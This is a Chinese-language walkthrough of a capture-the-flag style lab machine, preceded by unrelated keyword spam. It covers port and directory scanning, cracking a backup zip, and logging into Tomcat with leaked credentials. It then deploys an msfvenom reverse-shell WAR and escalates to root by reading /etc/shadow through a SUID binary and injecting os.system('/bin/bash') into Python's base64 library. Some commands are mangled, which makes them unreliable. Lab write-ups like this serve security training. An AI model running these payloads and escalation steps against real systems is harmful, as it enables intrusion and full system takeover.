制作网站站用的软件,手机网站智能管理系统,wordpress基础教程,南京建站公司模板文章目录 主机发现端口扫描ssh—22search openssh EXP web服务—8080目录扫描登录tomcat后台 提权切换用户查看用户权限寻找SUID命令破解登录密文 总结 主机发现
使用nmap扫描局域网内存活的主机#xff0c;命令如下#xff1a;
nmap -sP 192.168.151.0/24192.168.151.1命令如下
nmap -sP 192.168.151.0/24192.168.151.1主机IP192.168.151.2DHCP服务器IP192.168.151.5靶机IP192.168.151.4Kali IP。
端口扫描
使用nmap对靶机进行端口扫描命令如下
nmap -p- -sV -A 192.168.151.5 可见这台靶机开放了端口22ssh远程登录协议、80httpweb服务、8080httpweb服务。
ssh—22
search openssh EXP
searchsploit openssh # 搜索expweb服务—8080
目录扫描
使用dirsearch进行目录扫描。命令如下
dirsearch -u http://192.168.151.5 -e php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak在目录扫描中发现了一些东西 1.192.168.151.5/readme.txt发现这台主机的有一个用户为randy 2.192.168.151.5/backup.zip有一个备份文件发现加密了。
tomcat-users.xml中包含tomcat管理端所有用户的用户名和密码。
尝试用fcrackzip对zip文件进行解密命令如下
fcrackzip -D -p /usr/share/wordlist/rockyou.txt -u backup.zip-D表示使用字典对文件进行解析-p表示字典路径-u把密码显示在终端。 查看tomcat-users.xml的内容可以发现两个用户名和相应的密码
manager melehifokivai
admin melehifokivai登录tomcat后台
拿到用户名和密码后尝试区登录tomcat。点击manager app并输入用户名和密码。 成功登录tomcat管理后台登录进来是一个web项目发布的管理端。tomcat一般发布的是java的web工程发布的形式的话可以以目录的方式进行发布也可以以WAR包的形式进行发布。也就是存在上传点 使用msfvenom生成恶意程序也可以用它对恶意程序加密加壳等命令如下Reverse Shell Generator
msfvenom -p java/shell_reverse_tcp LHOST192.168.151.5 LPORT4444 -f war -o shell.war-p需要使用的payload-f输出格式-0输出路径。 war包其实就跟zip压缩包差不多可以直接使用unzip shell.war进行解压。 直接上传生成的shell.war然后需要做的就是nc -nlvp 4444监听本地端口访问192.168.151.5、shell即可reverse shell。 提权
使用下面的命令建立半交互式shell发现并没有python搞不定先不搞咯
python -c import pty;pty.spawn(/bin/bash)切换用户
先进入/home发现jaye、randy两个用户因为我们有一个zip压缩包的密码、登录tomcat后台的密码所以可以尝试用这两个密码去登录这两个用户。事实证明是可行的jaye用户的密码就是tomcat登录密码。
查看用户权限
查看jaye用户的权限发现当前用户不能使用sudo命令。
sudo -l # 查看当前用户是否具有sudo权限寻找SUID命令
寻找具备SUID属性的程序不知道的命令直接百度看是不是系统自带的命令这里发现了一个/home/jaye/Files/look程序具备SUID权限。
find / -perm -us -type f 2/dev/null # 搜索具备SUID属性的程序主要关注当前用户是不是可以以root用户去执行某些命令这个look命令大概意思就是找到文件中以指定字母开头的内容。 破解登录密文
尝试读取/etc/shadow文件查看该系统所有用户的密码密文
look /etc/shadow # 空字符就代表查看文件中的所有内容既然拿到密文可以使用john去尝试破解密文。
echo 密文 pw.txt
john --wprdlist/usr/share/wordlist/rockyou.txt pw.txtsu randy # 切换randy用户密码为07051986randy
sudo -l # 查看randy用户的sudo权限用户randy执行sudo /usr/bin/python3.8 /home/randy/randombase64.py时是以root用户执行的。
ls -l /home/randy/randombase64.py # 查看权限只有root用户具有可写权限
cat /home/randy/randombase64.py # 查看/home/randy/randombase64.py内容查看文件内容发现import base64思路在base64.py里加入os.system(/bin/bash)这样在调用该文件的时候就会获取root用户的shell
locate base64 # 定位base64文件
echo import os randombase64.py
echo os.system(/bin/bash) /usr/lib/python3.8/base64.py
sudo /usr/bin/python3.8 /home/randy/randombase64.py最终提权成功
总结
nmap端口扫描。发现靶机开放的服务对web服务进行目录扫描发现8080端口的web服务存在备份文件backup.zip使用john对zip文件进行密码破解查看tomcat-users.xml文件获得密码再登录tomcat后台msfvenom生成war包的后门文件通过tomcat上传WAR监听端口访问后门获取webshell由之前获取的密码登录靶机成功登录jaye用户寻找SUID程序由look程序查看/etc/shadow破解randy用户密码切换randy用户查看sudo用户权限修改randombase64.py文件且添加/bin/bash获取root用户的shell。
